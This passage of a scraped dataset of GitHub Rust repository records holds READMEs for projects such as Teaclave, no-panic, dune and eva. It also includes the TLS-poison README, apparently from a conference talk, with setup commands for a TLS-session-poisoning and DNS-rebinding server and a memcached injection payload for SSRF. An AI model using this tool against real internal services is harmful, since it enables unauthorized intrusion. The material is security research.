1936\n\nStart the two services:\n\n ./xiu config.toml\n ./xiu config_push.toml\n\nPush an RTMP live stream to the edge node; the stream is automatically relayed to the origin node, and it can be played from either the origin or the edge node:\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i rtmp://localhost:1936/live/test\n\n\n \n##### Relay - static pull\n\nThe scenario is that during playback a user pulls a stream from an edge node; if the edge node does not have the stream, it pulls it back from the origin node. The configuration files are as follows:\n\nOrigin node configuration file config.toml:\n\n [rtmp]\n enabled = true\n port = 1935\n\n \nEdge node configuration file config_pull.toml:\n\n [rtmp]\n enabled = true\n port = 1936\n [rtmp.pull]\n enabled = false\n address = \"localhost\"\n port = 1935\n\nRun the two services:\n\n ./xiu config.toml\n ./xiu config_pull.toml\n \nPush a live stream directly to the origin node, then request it from the edge node; the edge node pulls it back from the origin, and the stream can be played on both the edge and the origin node:\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i rtmp://localhost:1936/live/test\n \n## Star History\n\n[link](https://star-history.t9t.io/#harlanc/xiu)\n\n## Acknowledgments\n\n - [media_server](https://github.com/ireader/media-server.git)\n\n## Others\n\nFor any questions, please ask in the issues. Stars and pull requests are welcome; your attention helps this project go further and faster.\n \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/incubator-teaclave", "link": "https://github.com/apache/incubator-teaclave", "tags": ["rust", "sgx", "faas", "universal-secure-computing", "trusted-execution-environment", "function-as-a-service", "secure-multiparty-computation", "tee", "confidential-computing", "trustzone"], "stars": 662, "description": "Apache Teaclave (incubating) is an open source universal secure computing platform, making computation on privacy-sensitive data safe and simple.", "lang": "Rust", "repo_lang": "", "readme": "# Teaclave: A Universal Secure Computing Platform\n\n[![License](https://img.shields.io/badge/license-Apache-green.svg)](LICENSE)\n[![Release](https://img.shields.io/github/v/tag/apache/incubator-teaclave?label=release&sort=semver)](https://github.com/apache/incubator-teaclave/releases)\n[![Coverage Status](https://coveralls.io/repos/github/apache/incubator-teaclave/badge.svg?branch=master)](https://coveralls.io/github/apache/incubator-teaclave?branch=master)\n[![Homepage](https://img.shields.io/badge/site-homepage-blue)](https://teaclave.apache.org/)\n\nApache Teaclave (incubating) is an open source ***universal secure computing***\nplatform, making computation on privacy-sensitive data safe and simple.\n\n## Highlights\n\n- **Secure and Attestable**:\n Teaclave adopts multiple security technologies to enable secure computing. 
In\n particular, Teaclave uses Intel SGX to serve the most security-sensitive tasks\n with *hardware-based isolation*, *memory encryption* and *attestation*.\n Also, Teaclave is written in Rust to prevent *memory-safety* issues.\n- **Function-as-a-Service**:\n Teaclave is provided as a *function-as-a-service platform*. With many built-in\n functions, it supports tasks like machine learning, private set intersection,\n crypto computation, etc. In addition, developers can also deploy and execute\n Python scripts in Teaclave. More importantly, unlike traditional FaaS,\n Teaclave supports both general secure computing tasks and *flexible\n single- and multi-party secure computation*.\n- **Ease of Use**:\n Teaclave builds its components in containers, therefore, it supports\n deployment both locally and within cloud infrastructures. Teaclave also\n provides convenient endpoint APIs, client SDKs and command line tools.\n- **Flexible**:\n Components in Teaclave are designed in a modular manner, and features like remote\n attestation can be easily embedded in other projects. In addition, Teaclave\n SGX SDK and Teaclave TrustZone SDK can also be used separately to write TEE\n apps for other purposes.\n\n## Getting Started\n\n### Try Teaclave\n\n- [My First Function](docs/my-first-function.md)\n- [Write Functions in Python](docs/functions-in-python.md)\n- [How to Add Built-in Functions](docs/builtin-functions.md)\n- [Deploying Teaclave on Azure Confidential Computing VM](docs/azure-confidential-computing.md)\n- [Executing WebAssembly in Teaclave](docs/executing-wasm.md)\n- [Inference Task with TVM in Teaclave](docs/inference-with-tvm.md)\n\n### Design\n\n- [Threat Model](docs/threat-model.md)\n- [Mutual Attestation: Why and How](docs/mutual-attestation.md)\n- [Access Control](docs/access-control.md)\n- [Build System](docs/build-system.md)\n- [Teaclave Service Internals](docs/service-internals.md)\n- [Adding Executors](docs/adding-executors.md)\n- [Papers, Talks, and Related Articles](docs/papers-talks.md)\n\n### Contribute to Teaclave\n\n- [Release Guide](docs/release-guide.md)\n- [Rust Development Guideline](docs/rust-guideline.md)\n- [Development Tips](docs/development-tips.md)\n\n### Codebase\n\n- [Attestation](attestation)\n- [Binder](binder)\n- [Built-in Functions](function)\n- [Client SDK](sdk)\n- [Command Line Tool](cli)\n- [Common Libraries](common)\n- [Configurations in Teaclave](config)\n- [Crypto Primitives](crypto)\n- [Data Center Attestation Service](dcap)\n- [Dockerfile and Compose File](docker)\n- [Examples](examples)\n- [Executor Runtime](runtime)\n- [File Agent](file_agent)\n- [Function Executors](executor)\n- [Keys and Certificates](keys)\n- [RPC](rpc)\n- [Teaclave Services](services)\n- [Teaclave Worker](worker)\n- [Test Harness and Test Cases](tests)\n- [Third-Party Dependency Vendoring](third_party)\n- [Tool](tool)\n- [Types](types)\n\n### API References\n\n- [Teaclave SGX SDK](https://teaclave.apache.org/api-docs/sgx-sdk/)\n- [Teaclave Client SDK (Python)](https://teaclave.apache.org/api-docs/client-sdk-python/)\n- [Teaclave Client SDK (Rust)](https://teaclave.apache.org/api-docs/client-sdk-rust/)\n- [Crates in Teaclave (Enclave)](https://teaclave.apache.org/api-docs/crates-enclave/)\n- [Crates in Teaclave (App)](https://teaclave.apache.org/api-docs/crates-app/)\n\n## Teaclave Projects\n\nThis is the main repository for the Teaclave FaaS platform. 
There are several\nsub-projects under Teaclave:\n\n- [Teaclave SGX SDK](https://github.com/apache/incubator-teaclave-sgx-sdk)\n- [Teaclave TrustZone SDK](https://github.com/apache/incubator-teaclave-trustzone-sdk)\n\n## Contributing\n\nTeaclave is open source in [The Apache Way](https://www.apache.org/theapacheway/),\nwe aim to create a project that is maintained and owned by the community. All\nkinds of contributions are welcome. Read this [document](CONTRIBUTING.md) to\nlearn more about how to contribute. Thanks to our\n[contributors](https://teaclave.apache.org/contributors/).\n\n## Community\n\n- Join us on our [mailing list](https://lists.apache.org/list.html?dev@teaclave.apache.org).\n- Follow us at [@ApacheTeaclave](https://twitter.com/ApacheTeaclave).\n- See [more](https://teaclave.apache.org/community/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dtolnay/no-panic", "link": "https://github.com/dtolnay/no-panic", "tags": [], "stars": 660, "description": "Attribute macro to require that the compiler prove a function can't ever panic", "lang": "Rust", "repo_lang": "", "readme": "\\#\\[no\\_panic\\]\n===============\n\n[\"github\"](https://github.com/dtolnay/no-panic)\n[\"crates.io\"](https://crates.io/crates/no-panic)\n[\"docs.rs\"](https://docs.rs/no-panic)\n[\"build](https://github.com/dtolnay/no-panic/actions?query=branch%3Amaster)\n\nA Rust attribute macro to require that the compiler prove a function can't ever\npanic.\n\n```toml\n[dependencies]\nno-panic = \"0.1\"\n```\n\n```rust\nuse no_panic::no_panic;\n\n#[no_panic]\nfn demo(s: &str) -> &str {\n &s[1..]\n}\n\nfn main() {\n println!(\"{}\", demo(\"input string\"));\n}\n```\n\nIf the function does panic (or the compiler fails to prove that the function\ncannot panic), the program fails to compile with a linker error that identifies\nthe function name. Let's trigger that by passing a string that cannot be sliced\nat the first byte:\n\n```rust\nfn main() {\n println!(\"{}\", demo(\"\\u{1f980}input string\"));\n}\n```\n\n```console\n Compiling no-panic-demo v0.0.1\nerror: linking with `cc` failed: exit code: 1\n |\n = note: /no-panic-demo/target/release/deps/no_panic_demo-7170785b672ae322.no_p\nanic_demo1-cba7f4b666ccdbcbbf02b7348e5df1b2.rs.rcgu.o: In function `_$LT$no_pani\nc_demo..demo..__NoPanic$u20$as$u20$core..ops..drop..Drop$GT$::drop::h72f8f423002\nb8d9f':\n no_panic_demo1-cba7f4b666ccdbcbbf02b7348e5df1b2.rs:(.text._ZN72_$LT$no\n_panic_demo..demo..__NoPanic$u20$as$u20$core..ops..drop..Drop$GT$4drop17h72f8f42\n3002b8d9fE+0x2): undefined reference to `\n\n ERROR[no-panic]: detected panic in function `demo`\n '\n collect2: error: ld returned 1 exit status\n```\n\nThe error is not stellar but notice the ERROR\\[no-panic\\] part at the end that\nprovides the name of the offending function.\n\n*Compiler support: requires rustc 1.31+*\n\n
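For intuition, the linker-error trick (credited to the `dont_panic` crate in the acknowledgments below) can be sketched by hand. This is an illustrative approximation, not the macro's actual expansion; `panic_detected_here` and `Guard` are made-up names:

```rust
// Sketch of the technique behind #[no_panic]: reference an undefined
// symbol from code that is only reachable while unwinding from a panic.
extern "C" {
    // Deliberately never defined anywhere. If a reference to this symbol
    // survives optimization, linking fails with an undefined-symbol error.
    fn panic_detected_here() -> !;
}

struct Guard;

impl Drop for Guard {
    fn drop(&mut self) {
        // Only runs if a panic unwinds past the guard; on the normal path
        // the `mem::forget` below makes this drop unreachable.
        unsafe { panic_detected_here() }
    }
}

fn demo(s: &str) -> &str {
    let guard = Guard;
    let out = &s[1..]; // a panic here would drop `guard` during unwinding
    std::mem::forget(guard); // normal return: the guard never drops
    out
}

fn main() {
    println!("{}", demo("input string"));
}
```

If the optimizer proves the function body cannot panic, the drop call is dead code, the symbol is never referenced, and the program links; otherwise the link fails. This is also why the attribute may need optimizations enabled, as the caveats below explain.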
\n\n### Caveats\n\n- Functions that require some amount of optimization to prove that they do not\n panic may no longer compile in debug mode after being marked `#[no_panic]`.\n\n- Panic detection happens at link time across the entire dependency graph, so\n any Cargo commands that do not invoke a linker will not trigger panic\n detection. This includes `cargo build` of library crates and `cargo check` of\n binary and library crates.\n\n- The attribute is useless in code built with `panic = \"abort\"`.\n\nIf you find that code requires optimization to pass `#[no_panic]`, either make\nno-panic an optional dependency that you only enable in release builds, or add a\nsection like the following to Cargo.toml to enable very basic optimization in\ndebug builds.\n\n```toml\n[profile.dev]\nopt-level = 1\n```\n\nIf the code that you need to prove isn't panicking makes function calls to\nnon-generic non-inline functions from a different crate, you may need thin LTO\nenabled for the linker to deduce those do not panic.\n\n```toml\n[profile.release]\nlto = \"thin\"\n```\n\nIf you want no\\_panic to just assume that some function you call doesn't panic,\nand get Undefined Behavior if it does at runtime, see [dtolnay/no-panic#16]; try\nwrapping that call in an `unsafe extern \"C\"` wrapper.\n\n[dtolnay/no-panic#16]: https://github.com/dtolnay/no-panic/issues/16\n\n
\n\n### Acknowledgments\n\nThe linker error technique is based on [Kixunil]'s crate [`dont_panic`]. Check\nout that crate for other convenient ways to require absence of panics.\n\n[Kixunil]: https://github.com/Kixunil\n[`dont_panic`]: https://github.com/Kixunil/dont_panic\n\n
\n\n#### License\n\n\nLicensed under either of Apache License, Version\n2.0 or MIT license at your option.\n\n\n
\n\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in this crate by you, as defined in the Apache-2.0 license, shall\nbe dual licensed as above, without any additional terms or conditions.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adam-mcdaniel/dune", "link": "https://github.com/adam-mcdaniel/dune", "tags": ["shell", "console", "terminal", "command-line", "scripting-language"], "stars": 659, "description": "A shell\ud83d\udc1a by the beach\ud83c\udfd6\ufe0f!", "lang": "Rust", "repo_lang": "", "readme": "# dune\n\nA shell by the beach!\n\n

[demo video thumbnail]

\n\n##### _NOTE: Click the image above for a video demonstration._\n\n## About the Author\n\nI'm a *bored* sophomore in college working on projects to fill the time. If you enjoy my work, consider supporting me by buying me a coffee! \n\n\n \"Buy\n\n\n## Why write another shell?\n\nI feel that bash is great in a lot of ways, but it doesn't exactly feel *cozy*: it's lacking a sort of personal touch, and it's also missing quick and easy customizability. With my last shell, [Atom](https://github.com/adam-mcdaniel/atom), I had accomplished some of the coziness that bash was missing, but I also introduced a lot of *really* fatal flaws in the syntax and the type system.\n\nDune, however, is designed ***completely*** differently from Atom (although you might notice the similarities in their widget systems). The interpreter itself is standalone, and it holds almost none of the functionality you see in the default distribution of Dune. If you wanted to, you could write a custom frontend and make a unique Dune based shell of your own!\n\nThis frontend implementation turns the coziness dial to 11. Just check out the shell's default startup script!\n\n

[screenshot: Dune's default startup script]

\n\nI put a *lot* of work into making Dune just fun to use. It's like a neat little operating system itself!\n\nDune also attempts to be a usable scripting language, and even offers a few niche metaprogramming features such as quoting *(borrowed from [Lisp](https://github.com/adam-mcdaniel/wisp))*, operator overloading, and macros!\n\n

[screenshot: quoting, operator overloading, and macros in action]

\n\nOverall, I wrote Dune to have a *complete* shell of my own: one that's fast, useful, and pretty.\n\n*(Also, writing a shell is just kinda really fun)*\n\n## Usage\n\nDune has a bunch of customizable components. Here's how you can change them and make your shell your own!\n\n### The Prelude\n\nBefore entering interactive mode, Dune executes *the prelude*. The prelude is just the startup file `.dune-prelude` stored in the home directory for your user. If you don't provide your own prelude file, Dune will execute its own default prelude with an introduction to the shell.\n\nYou can see my example personal prelude [here](./.dune-prelude).\n\n### The REPL\n\nDune's REPL is entirely customizable by overloading the following functions:\n\n|Name|Purpose|Default Implementation|\n|-|-|-|\n|`prompt`|This function is called to generate the text which prompts the user for input. It takes the current working directory, and returns a string.|
let prompt = cwd -> fmt@bold ((fmt@dark@blue \"(dune) \") +
(fmt@bold (fmt@dark@green cwd)) +
(fmt@bold (fmt@dark@blue \"$ \")))
|\n|`incomplete_prompt`|This function is called to generate the text which prompts the user for input when they have entered an incomplete expression. It takes the current working directory, and returns a string.|
let incomplete_prompt = cwd -> ((len cwd) +
(len \"(dune) \")) * \" \" +
(fmt@bold (fmt@dark@yellow \"> \"));
|\n|`report`|This function is called to print a value to the console after evaluation.|*The default implementation is a builtin function (implemented in Rust), but you can overload it with any callable value nonetheless.*|\n\nI highly recommend using the `fmt` module when implementing your own customizations for your prompt!\n\n### Aliases\n\nThis distribution of Dune uses the *`Symbol`* type (the type of variable names and paths) to implement calling programs. Whenever an expression of type *`Symbol`* is evaluated as a command in interactive mode, it is invoked as a program.\n\nBecause of this, you can define aliases by assigning a variable to a program's name like so!\n\n\n\nIf you have defined a variable that overshadows your program's name (such as an alias), you can *quote* the program name to run it.\n\n![Overshadowed](./assets/overshadowed.png)\n\n### Macros\n\nTo write functions that modify your shell's environment and act like commands or programs themselves, use a macro!\n\n![Macros](./assets/macros.png)\n\nMacros, when called with zero arguments, are passed the current working directory. When invoked, they assume the environment of the callee: if you execute a macro, it will execute as if you executed the contents of the macro itself with the parameter defined as the argument passed.\n\n### Piping and Redirection\n\nPiping and redirection are done with the `|` and `>>` operators. Here's some example uses!\n\n![Piping and Redirection](./assets/piping.png)\n\nIf a value is piped into a callable object, like a function or macro, it is performed as an application; otherwise, the expression is treated like a regular call to a program.\n\n## Standard Library\n\nDune offers an extensive standard library, and also provides a pretty interface to see all the functions available in each module!\n\n\n\nDune offers the following builtin libraries:\n\n|Name|Description|\n|-|-|\n|`rand`|A library for randomness|\n|`time`|A library with date and time functions|\n|`math`|A module for math and trig functionality|\n|`fs`|A module for interacting with the file system|\n|`fn`|A functional programming library|\n|`fmt`|A library for text formatting on the console (color, styling, hyperlinks, text wrapping, etc.)|\n|`os`|A small module with the host's OS info|\n|`widget`|A module for creating text widgets|\n|`shell`|A small module for information about the Dune shell|\n|`console`|A library for manipulating the console|\n\nFor more information about each, just run `echo library-name`.\n\n## Installation\n\nTo install, you must download Rust from [here](https://www.rust-lang.org/).\n_If you already have Rust installed **you will probably need to update**. Dune uses a lot of recently stabilized features._\n\n#### Development Build\n\n```bash\n# Install directly from git with cargo\ncargo install --git https://github.com/adam-mcdaniel/dune\n\n# Or, alternatively, the repo and install from source\ngit clone https://github.com/adam-mcdaniel/dune\ncd dune\ncargo install -f --path .\n```\n\n#### Releases\nTo get the current release build, install from [crates.io](https://crates.io/crates/dune).\n\n```bash\n# Also works for updating dune\ncargo install -f dune\n```\n_Currently, since Dune is in its early stages of development, I would recommend against using releases at the moment. 
There are a lot of bug fixes and new features added inbetween releases._\n\n#### After Install\n\n```bash\n# Just run the dune executable!\ndunesh\n```\n", "readme_type": "markdown", "hn_comments": "It is lovely to see someone sharing software work they did just because they find it subject interesting and fun, not to make a buck or pad a portfolio. This has some good hacker vibes, harder and harder to find these days. Bravo.Try it online: https://nextrepl.leaningtech.com/dune.htmlPowered by CheerpX: A WebAssembly virtual machine for X86 executables.Please note that is a sneak preview of our tech, we plan to release it soon to the public. Stay tuned.https://twitter.com/leaningtechhttps://twitter.com/alexpignottiReminds me of abduco + dvtm, which was pretty bananas to use, but felt _right_ and very unixy.Though, I just use screen now.Impressive indeed. But not sure whether I'd want a widget system built into my shell. Sort of breaks the UNIX philosophy, doesn't it?edit: fixed typoIt's probably worth noting that Dune is already the name of the OCaml build system.Other than that, this is a really interesting and creative project. I'm curious what it will be like to use it in a \"real\" session, I might have to download it and try it.Well this guy is a genious. Congrats on the release.Does this support pipes? It's not clear to me what runs in the same process and what forks a new one. Is there a way to run some shell code in a sub-process (parentheses in conventional shell)? Asynchronously (& in conventional shell)?It's called \"Dune\" and yet I can't find a single Arrakis reference in the repo?!All the best to this project but since new cool shells keep coming up in the frontpage here, I am wondering if anybody is using an alternative shell as a daily driver and getting considerably more out of it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jmdx/TLS-poison", "link": "https://github.com/jmdx/TLS-poison", "tags": [], "stars": 659, "description": null, "lang": "Rust", "repo_lang": "", "readme": "# TLS Poison\n[YouTube link to presentation](https://youtube.com/watch?v=qGpAJxfADjo)\n\nA tool that allows for generic SSRF via TLS, as well as CSRF via image tags\nin most browsers. The goals are similar to\n[SNI injection](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf),\nbut this new method uses inherent behaviors of TLS,\ninstead of depending upon bugs in a particular implementation.\n\nThis was originally presented at [Blackhat USA 2020](https://www.blackhat.com/us-20/briefings/schedule/#when-tls-hacks-you-19446)\nas well as [DEF CON Safemode](https://www.defcon.org/html/defcon-safemode/dc-safemode-speakers.html#Maddux).\n\nA big thanks goes out to [rustls](https://github.com/ctz/rustls) and \n[dns-mitm](https://github.com/SySS-Research/dns-mitm), each of which this\nis mostly just a strange patched fork.\n\n## Motivation\nBack when gopher support was common, people got a lot of mileage out of\nusing it for SSRF. So much so that there's pretty good tooling like\n[Gopherus](https://github.com/tarunkant/Gopherus) for doing so. This \nis because there are some software packages that often sit unauthenticated\non localhost or on an internal network. A common one is memcached,\nbecause writing to memcached can often become RCE. 
\n\nWhat if we could replicate this behavior, but instead of giving\nthe attack target a `gopher://` URL which isn't often supported, we\ngive it an `https://` URL? This has been done before with SNI injection,\nbut what if we did it in a more universal way?\n\nIt turns out TLS provides us with the perfect thing - session persistence!\nI plan on eventually writing up how this works, as well as more detail on\nwhat attacks can be done with it. For now you can either watch the Blackhat\nor DEF CON talk, or attempt to decipher the following diagram I came up\nwith a while back:\n![tes](diagram.svg)\n\n## Instructions\nAs a heads up, you will need a domain where you can set NS records.\nIf needed can find a few free subdomain providers which may work by\n[searching around](https://www.google.com/search?q=free+subdomain+hosting+with+ns+record),\nbut I have only tried with a dedicated top-level domain. In any case\nI'd recommend holding off on registering anything until you complete the\nfirst few steps to make sure everything's working properly.\n### TLS server\nThis should be on something public, where the DNS rebinding server will\neventually resolve to. You should probably use a dedicated box/VM for\nthis, since you'll end up exposing whatever port you want to target, e.g.\n11211 for memcached or 25 for SMTP.\n```bash\n# Install dependencies\nsudo apt install git redis\ngit clone https://github.com/jmdx/TLS-poison.git\n# Install rust:\ncurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh\ncd TLS-poison/client-hello-poisoning/custom-tls\n# There will definitely be warnings I didn't clean up :)\ncargo build\n# Test out the server:\ntarget/debug/custom-tls -p 8443 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa http\n# (In another terminal to verify setup)\ncurl -kv https://localhost:8443\n```\n \n ### DNS rebinding server\n You'll need this on a public box as well. If you know for sure your\n box doesn't have a `systemd-resolved` stub resolver, it can be on the\n same box as `custom-tls`, but I'd recommend putting this on its own.\n ```bash\nsudo apt install python3 python3-pip\ngit clone https://github.com/jmdx/TLS-poison.git\ncd TLS-poison/client-hello-poisoning/custom-dns\npip3 install -r requirements.txt\n# $DOMAIN: The domain you own where you will set up NS records\n# $TARGET_IP: Likely 127.0.0.1, though you can set this to be some box \n# netcat listening, for early phases of testing.\n# $INITIAL_IP: The IP of the box with custom-tls\nsudo python3 alternate-dns.py $DOMAIN,$TARGET_IP -b 0.0.0.0 -t $INITIAL_IP -d 8.8.8.8\n# If you get \"OSError: address already in use\", you can do the following\n# to stop systemd-resolved. This might mess up lots of things outside of\n# custom-dns, but if it's on a dedicated VM, you're probably okay.\n# A better way is to add DNSStubListener=no to /etc/systemd/resolved.conf\nsudo systemctl stop systemd-resolved\n# Finally, to verify, run the following a few times to see it alternating:\ndig @localhost $DOMAIN\n```\n\n### Setting up the NS record and certificates\nYou'll need to set up an NS record and a glue record so that DNS requests \ngo to your rebinding server. For example, if your domain is example.com,\nyou should add:\n```\ndns.example.com A 300 \ntlstest.example.com NS 300 dns.example.com\n```\nThen to get a TLS certificate for `tlstest.example.com`, go to the\n[certbot DNS instructions](https://certbot.eff.org/docs/using.html#dns-plugins) and complete a DNS challenge for it. 
Then, go back to\n`custom-tls` and rerun it:\n```bash\ntarget/debug/custom-tls -p 8443--verbose --certs letsencrypt-cert.fullchain --key letsencrypt-key.rsa http\n```\nNow you're set up to attack real stuff! When something makes a request to\n`https://tlstest.jmaddux.com:8443`, both the TLS session poisoning and DNS\nrebinding steps should be fully functional.\n\n### Putting it all together\nTo use this in different situations, you'll need to vary a few things:\n- port: Your TLS server will need to run on this port, since rebinding only\nswitches up the domain (e.g. tlstest.example.com:11211 can be either 35.x.x.x:11211,\nor 127.0.0.1:11211)\n- sleep: The duration the TLS server sleeps between redirects. This varies\nbased upon what software you are sending custom-tls server, instead of what\ninternal service you're attacking. For example, testing curl-initited SSRF this\ncan be 10000ms, but for chrome-based stuff it can be quite short. On the other\nhand, if you see the attacks failing because you hit a maximum number of redirects,\nconsider increasing this to 59000ms or beyond. If you don't see TLS sessions being\npersisted and re-delivered to the internal service, it can often be fixed by\nvarying the sleep time.\n- payload: Typically will start with a newline, and then have whatever commands\nyou want to inject into the protocol you're targeting.\n\nFor example, for memcached:\n```bash\nredis-cli\n127.0.0.1:6379> set payload \"\\r\\nset foo 0 0 14\\r\\nim in ur cache \\r\"\nCtrl+c\n# Note the following is port 11211 now.\ntarget/debug/custom-tls -p 11211 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa -p 11211 http\n```\nThen run you can supply https://tlstest.example.com:11211 as your SSRF payload.\nIf you want to reproduce my curl/memcached demo from the talk, you'll want to pass `-L` to curl to enable redirects, since command-line curl will use a fresh cache each time it's run.\nGood luck, and make sure not to attack anything you don't have permission!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nerdypepper/eva", "link": "https://github.com/nerdypepper/eva", "tags": ["cli", "calculator", "rust", "hacktoberfest"], "stars": 659, "description": "a calculator REPL, similar to bc(1)", "lang": "Rust", "repo_lang": "", "readme": "\n![heroimg.png](https://u.peppe.rs/6G.png)\n\n# eva\n\nsimple calculator REPL, similar to `bc(1)`, with syntax highlighting and persistent history\n\n![eva.png](https://u.peppe.rs/kP.png)\n\n### installation\n\n- Homebrew\n```shell\n$ brew install eva\n```\n\n- crates.io\n```shell\n$ cargo install eva\n```\n\n- manual\n```shell\n$ git clone https://github.com/nerdypepper/eva\n$ cd eva\n$ cargo run\n```\n\n### usage\n\n```shell\neva 0.3.1\nNerdyPepper \nCalculator REPL similar to bc(1)\n\nUSAGE:\n eva [OPTIONS] [INPUT]\n\nARGS:\n Optional expression string to run eva in command mode\n\nOPTIONS:\n -b, --base Radix of calculation output (1 - 36) [default: 10]\n -f, --fix Number of decimal places in output (1 - 64) [default: 10]\n -h, --help Print help information\n -r, --radian Use radian mode\n -V, --version Print version information\n\n```\n\ntype out an expression and hit enter, repeat.\n\n```shell\n> 1 + sin(30)\n1.5\n> floor(sqrt(3^2 + 5^2))\n5\n> 5sin(45) + cos(0)\n4.53553\n```\n\n### updating\n\n - crates.io\n ```shell\n$ cargo install eva --force\n ```\n\n - manual\n```shell\n$ cargo install --force --path 
/path/to/eva\n```\n\n### operators\n\n - binary operators: `+ - * / ^ **`\n - unary operators: `+ -`\n\n### constants\n\nsome constants available in rust standard library.\n\n```\ne pi\n```\n\nexamples:\n```\npi * 5^2 # \u03c0r\u00b2\n```\n\n### functions\n\nall trigonometric functions expect input in degrees.\n\n```\n1 argument:\nsin cos tan csc sec cot sinh cosh tanh\nasin acos atan acsc asec acot ln log10 sqrt\nceil floor abs\n\n2 arguments:\nlog nroot\n\ndeg(x) - convert x to degrees\nrad(x) - convert x to radians\n```\n\nexamples:\n```\nsqrt(sin(30)) # parentheses are mandatory for functions\n\nlog10100 # no\nlog10(100) # yes\n\nlog(1, 10) # function with two arguments\n```\n\n### quality of life features\n\n - auto insertion of `*` operator\n```\n>12sin(45(2)) # 12 * sin(45 * (2))\n12\n```\n\n - auto balancing of parentheses\n```\n>ceil(sqrt(3^2 + 5^2 # ceil(sqrt(3^2 + 5^2))\n6\n```\n\n - use previous answer with `_`\n```\n> sin(pi)\n0.0548036650\n> _^2\n0.0030034417\n>\n```\n\n- super neat error handling\n```\n> 1 + ln(-1)\nDomain Error: Out of bounds!\n```\n\n - syntax highlighting\n\n### todo\n\n - ~~add support for variables (pi, e, _ (previous answer))~~\n - ~~syntax highlighting~~\n - ~~multiple arg functions~~\n - ~~screenshots~~\n - ~~create logo~~\n - ~~unary operators (minus, plus)~~\n - ~~add detailed error handler~~\n - ~~add unit tests~~\n - ~~lineditor~~ with syntax highlighting\n - ~~add more functions~~\n\n### contributors\n\nthe rust community has helped eva come a long way, but these devs deserve a\nspecial mention for their contributions:\n\n[Ivan Tham](https://github.com/pickfire) \n[Milan Markovi\u0107](https://github.com/hepek) \n[asapokl](https://github.com/kzoper) \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RustAudio/dasp", "link": "https://github.com/RustAudio/dasp", "tags": [], "stars": 659, "description": "The fundamentals for Digital Audio Signal Processing. Formerly `sample`.", "lang": "Rust", "repo_lang": "", "readme": "# dasp [![Actions Status][dasp-actions-svg]][dasp-actions] [![docs.rs][dasp-docs-rs-svg]][dasp-docs-rs]\n\n**Digital Audio Signal Processing in Rust.**\n\n*Formerly the [`sample` crate](https://crates.io/crates/sample).*\n\nA suite of crates providing the fundamentals for working with PCM (pulse-code\nmodulation) DSP (digital signal processing). In other words, `dasp` provides a\nsuite of low-level, high-performance tools including types, traits and functions\nfor working with digital audio signals.\n\nThe `dasp` libraries require **no dynamic allocations**1 and have\n**no dependencies**. The goal is to design a library akin to the **std, but for\naudio DSP**; keeping the focus on portable and fast fundamentals.\n\n1: Besides the feature-gated `SignalBus` trait, which is occasionally\nuseful when converting a `Signal` tree into a directed acyclic graph.\n\nFind the [API documentation here][dasp-docs-rs].\n\n\n## Crates\n\n**dasp** is a modular collection of crates, allowing users to select the precise\nset of tools required for their project. The following crates are included\nwithin this repository:\n\n| **Library** | **Links** | **Description** |\n| --- | --- | --- |\n| [**`dasp`**][dasp] | [![Crates.io][dasp-crates-io-svg]][dasp-crates-io] [![docs.rs][dasp-docs-rs-svg]][dasp-docs-rs] | Top-level API with features for all crates. 
|\n| [**`dasp_sample`**][dasp_sample] | [![Crates.io][dasp_sample-crates-io-svg]][dasp_sample-crates-io] [![docs.rs][dasp_sample-docs-rs-svg]][dasp_sample-docs-rs] | Sample trait, types, conversions and operations. |\n| [**`dasp_frame`**][dasp_frame] | [![Crates.io][dasp_frame-crates-io-svg]][dasp_frame-crates-io] [![docs.rs][dasp_frame-docs-rs-svg]][dasp_frame-docs-rs] | Frame trait, types, conversions and operations. |\n| [**`dasp_slice`**][dasp_slice] | [![Crates.io][dasp_slice-crates-io-svg]][dasp_slice-crates-io] [![docs.rs][dasp_slice-docs-rs-svg]][dasp_slice-docs-rs] | Conversions and ops for slices of samples/frames. |\n| [**`dasp_ring_buffer`**][dasp_ring_buffer] | [![Crates.io][dasp_ring_buffer-crates-io-svg]][dasp_ring_buffer-crates-io] [![docs.rs][dasp_ring_buffer-docs-rs-svg]][dasp_ring_buffer-docs-rs] | Simple fixed and bounded ring buffers. |\n| [**`dasp_peak`**][dasp_peak] | [![Crates.io][dasp_peak-crates-io-svg]][dasp_peak-crates-io] [![docs.rs][dasp_peak-docs-rs-svg]][dasp_peak-docs-rs] | Peak detection with half/full pos/neg wave rectifiers. |\n| [**`dasp_rms`**][dasp_rms] | [![Crates.io][dasp_rms-crates-io-svg]][dasp_rms-crates-io] [![docs.rs][dasp_rms-docs-rs-svg]][dasp_rms-docs-rs] | RMS detection with configurable window. |\n| [**`dasp_envelope`**][dasp_envelope] | [![Crates.io][dasp_envelope-crates-io-svg]][dasp_envelope-crates-io] [![docs.rs][dasp_envelope-docs-rs-svg]][dasp_envelope-docs-rs] | Envelope detection with peak and RMS impls. |\n| [**`dasp_interpolate`**][dasp_interpolate] | [![Crates.io][dasp_interpolate-crates-io-svg]][dasp_interpolate-crates-io] [![docs.rs][dasp_interpolate-docs-rs-svg]][dasp_interpolate-docs-rs] | Inter-frame rate interpolation (linear, sinc, etc). |\n| [**`dasp_window`**][dasp_window] | [![Crates.io][dasp_window-crates-io-svg]][dasp_window-crates-io] [![docs.rs][dasp_window-docs-rs-svg]][dasp_window-docs-rs] | Windowing function abstraction (hann, rectangle). 